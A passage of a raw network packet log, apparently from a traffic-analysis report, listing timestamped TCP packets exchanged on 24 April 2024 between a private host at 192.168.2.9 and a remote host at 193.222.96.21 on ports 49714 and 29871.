                                                          Apr 24, 2024 07:13:21.491127014 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491240025 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491312027 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.491349936 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491405010 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491450071 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.491465092 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491559029 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491600037 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491650105 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.491653919 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491699934 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.491731882 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491791010 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491832018 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.491846085 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491890907 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.491938114 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.492055893 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492175102 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492213964 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492223024 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.492255926 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492300987 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.492326975 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492470026 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492511988 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.492563963 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492621899 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492681026 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.492712021 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492821932 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492868900 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.492877960 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.492968082 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493004084 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493031979 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493046045 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493103027 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493114948 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493146896 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493196964 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493202925 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493283033 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493319988 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493326902 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493370056 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493413925 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493437052 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493484974 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493539095 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493546009 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493607998 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493654966 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493658066 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493714094 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493757010 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493763924 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493896961 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.493943930 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.493959904 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494016886 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494065046 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.494113922 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494175911 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494210005 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.494277000 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494386911 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494434118 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.494438887 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494534016 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494585037 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.494715929 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494785070 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494837999 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.494848013 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494894981 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494942904 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.494945049 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495064974 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495114088 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495115042 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495188951 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495237112 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495238066 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495294094 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495332003 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495341063 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495404959 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495443106 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495462894 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495501995 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495552063 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495630026 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495810986 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495856047 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.495868921 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495908022 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.495953083 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496046066 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496098042 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496161938 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496211052 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496268988 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496306896 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496314049 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496367931 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496412992 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496462107 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496573925 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496627092 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496634007 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496689081 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496726990 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496745110 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496820927 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496865034 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.496912956 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.496969938 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.497023106 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.497029066 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.497282982 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.497323990 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.497472048 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.497526884 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.497570992 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.791573048 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.791642904 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.791699886 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.791707993 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.791759968 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.791799068 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.791801929 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.791856050 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.791894913 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.792000055 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792057037 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792097092 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.792169094 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792207003 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792248011 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.792263985 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792300940 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792356968 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.792496920 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792551994 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792603016 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.792676926 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792741060 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792785883 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.792845964 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792903900 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792959929 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.792984962 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.793035030 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793082952 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.793092966 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793148041 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793184996 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793193102 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.793222904 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793270111 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.793658018 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793711901 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793759108 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.793785095 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793874025 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.793919086 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.794051886 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794329882 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794378996 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.794420004 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794500113 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794547081 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.794555902 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794595003 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794642925 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.794687986 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794745922 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.794792891 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.795073986 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795140028 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795186043 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.795196056 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795244932 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795291901 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.795317888 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795372963 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795409918 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795418978 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.795557976 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795607090 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.795614004 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795651913 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795697927 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.795876026 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795949936 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.795996904 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.796174049 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796317101 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796375990 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.796390057 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796447992 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796484947 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796494961 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.796610117 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796658993 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.796709061 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796782970 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796819925 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796830893 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.796933889 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.796983004 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.796997070 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.797038078 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.797089100 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.797689915 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.797859907 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.797908068 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.797944069 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.797982931 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798032045 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798038006 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798103094 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798151970 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798177004 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798291922 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798329115 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798338890 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798439026 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798486948 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798497915 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798553944 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798593044 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798602104 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798652887 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798690081 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798696041 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798760891 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798799038 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798805952 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798876047 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798912048 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.798922062 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.798970938 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799009085 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799021959 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.799130917 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799192905 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.799475908 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799592018 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799642086 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.799706936 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799774885 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799823999 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.799844027 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799901962 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799940109 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.799949884 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.799998999 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800046921 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800059080 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800170898 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800220013 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800242901 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800288916 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800334930 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800338030 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800401926 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800441980 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800460100 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800530910 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800578117 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800632000 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800669909 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800717115 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800724030 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800760984 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800800085 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800805092 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800837994 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800883055 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800884962 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800941944 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.800987959 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.800988913 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801044941 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801090956 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801099062 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801153898 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801204920 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801209927 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801281929 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801327944 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801327944 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801377058 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801430941 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801441908 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801510096 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801553011 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801570892 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801609039 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801647902 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801717997 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801775932 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801820993 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801832914 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801872969 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801917076 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.801944017 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.801997900 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802042007 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802071095 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802118063 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802167892 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802167892 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802237034 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802284002 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802284956 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802323103 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802366972 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802475929 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802562952 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802608013 CEST4971429871192.168.2.9193.222.96.21
                                                          Apr 24, 2024 07:13:21.802699089 CEST2987149714193.222.96.21192.168.2.9
                                                          Apr 24, 2024 07:13:21.802773952 CEST2987149714193.222.96.21192.168.2.9
